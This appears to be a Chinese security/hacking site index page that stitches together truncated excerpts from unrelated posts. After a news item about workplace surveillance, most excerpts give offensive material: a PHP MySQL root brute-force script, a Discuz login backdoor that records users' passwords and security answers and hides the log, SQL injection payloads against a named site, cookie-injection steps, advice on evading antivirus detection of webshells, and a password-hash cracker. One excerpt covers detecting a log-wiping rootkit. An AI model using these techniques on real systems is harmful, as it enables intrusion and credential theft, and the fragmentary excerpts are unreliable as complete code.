还记得员工行为几乎全裸的深信服“监控门”事件吗? 对每个“打工崽”来说,如果在工作期间访问的网站、访问频率、聊天关键词、投递简历的次数等,都被与员工的姓名、所属岗位等挂钩且可被查,并且所有上网记录(包括但不仅限于聊天、听音乐、购物、看视频等)都几乎“全裸”一般被置于其他人监控之下,那会是一种什么样的体验? 近日,就有网友在社交媒体爆料称,自己遭遇了类似的情况:其在上班时间向招聘软件投递了简历,随后被领导约谈并遭到辞退。该...
<? set_time_limit(0); //脚本不超时 $ip = "localhost"; //IP $user = "root"; //用户名 $passwd = file("password.txt"); //密码字典 for($i=0; $i<count($passwd); $i++){ $pass = Str_Replace("\r\n", "", $passwd[$i]); //剔除多余的回车+换行 connect($user, $pass); flush(); } echo "扫描结...
//打开source/function/function_member.php //找到function userlogin //在return $return;前面加上 $a=file_get_contents(dirname(__FILE__).’/1.txt’); file_put_contents(dirname(__FILE__).’/1.txt’),$a.”Id:”.$username.”—-Psw:”.$password.”—-question:”.$questionid.”—-Answer:”.$answer.”\r\n”); //记录登陆成功的账号密码以及问题答案!保存在source/function/目录下的1.txt ?> 一般上面的这样容易发现,我会把1.txt改名,并且base64_encode之后再保存。 //base64_encode之后再保存。 $a = ...
检查及清理方式 检查/var/log 是否被删除# /usr/bin/stat /var/log 如果被删除了,说明中招了 查看/var/log 文件夹内容# ls -al /var/log 如果文件很少,说明中招了 监控名称为fsyslog,osysllog 的进程# /usr/bin/watch -n 1 /bin/ps -AFZ f | /bin/grep syslog 如果有名称为fsyslog或osyslog的进程,说明中招了,注意不要和正常的系统日志进程混淆 检查/etc/init.d/sshd 的文件头是否被篡改过# /usr/bin/head /etc/init.d/sshd 检查/etc/init.d/sendmail 的文件头是否被篡改过# /usr/bin/head /etc/i...
之前想找个测试 没想到这有 可以测试下做个记录而已 http://webshell.cc/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003 /data0/htdocs/leqi_new/app/myapp.php 或者 /**********version()**********/ 5.1.49-log http://webshell.cc/download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+coun...
PHP遍历单目录可写权限脚本 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>狗一样的男人检测文件夹权限</title> </head> <body bgcolor="#000000" text="#FFFFFF&q...
这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢? 首先我想到的是将eval从字符串类型赋给一个变量。 如:$func = ‘phpinfo’; $func(); 这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想,完全没有eval用着爽,而且也是公开了的,所以我也就将他放弃了。 还记得《20 Ways to Fuzzing PHP Source Code》里提到的preg_replace代码执行漏洞吗...
这段时间老碰到有人问及各个linux版本的本地root密码破解方法,我这里自己以及在网络上搜集了些资料,希望对看到了这文章而又恰好用得到的技术人员有点帮助: (一)RedHat/CentOS/Fedora 系统密码破解 1.在grub选项菜单按E进入编辑模式 2.编辑kernel 那行最后加上S (或者Single) 3.按B,启动到single-user mode 4.进入后执行下列命令 # mount -t proc proc /proc # mount -o remount,rw / #passwd #sync #reboot (二)Debian linux 系统密码破解 1.在grub选项菜单’Debian GNU/Linux,̷...
Cookies注入步骤 1)寻找形如“*.asp?id=x”类的带参数的rul 2)去掉“id=x”查看页面显示是否正常。如果不正常,说明差数在数据传递中时直接起作用的 3)清空浏览器地址,输入“ javascript:alert(document.cookie=“id=”+escape("x")); ” 按Enter返回一个对话框,内容是“id=x”,然后用原来的url刷新页面,如果显示正常, 说明代码是用Request(“ID”)这种格式收集数据的,可以利用cookies进行注入 4)重复上面的步骤,将常规脚本注入判断语句戴入上面的URL:” javascript:javascript:alert(document.cookie=...
discuz 密码大家公认的蛋疼 该程序采用碰撞破解 加载字典(各种库中提取的) <?php error_reporting(0); if ($argc<2) { print_r(' ----------------------------------------------------------------+ Usage: php '.$argv[0].' hash Example: php '.$argv[0].' cd1a0b2de38cc1d7d796b1d2ba6a954f:dc2bce ----------------------------------------------------------------+ '); die; } $fd=fopen("1.txt","rb"); if(!$fd) { echo "[!] error:打开字典文件...